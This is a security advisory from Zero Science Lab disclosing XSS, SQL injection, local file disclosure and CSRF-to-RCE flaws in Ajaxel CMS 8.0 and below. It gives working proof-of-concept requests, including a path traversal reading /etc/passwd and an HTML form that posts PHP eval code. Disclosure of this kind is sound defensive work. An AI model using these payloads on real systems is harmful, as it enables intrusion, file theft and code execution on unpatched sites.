Ajaxel CMS 8.0 Multiple Vulnerabilities


Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below

Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.

Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.

Tested on: Apache 2.4.10
           MySQL 5.5.46


Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski - [dizzyduck_at_zeroscience.mk]


Advisory ID: ZSL-2016-5320
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5320.php


13.04.2016

--


1. Reflected XSS:
-----------------

GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5

HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200, USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/', REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0, URL_KEY_ADMIN:'cms',...


2. SQL Injection:
-----------------

http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>


3. Local File Disclosure:
-------------------------

http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd


4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------

<html>
  <body>
    <form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load" method="POST">
      <input type="hidden" name="data&#91;eval&#93;" value="phpinfo&#40;&#41;&#59;" />
      <input type="hidden" name="a" value="eval" />
      <input type="hidden" name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
      <input type="submit" value="Execute" />
    </form>
  </body>
</html>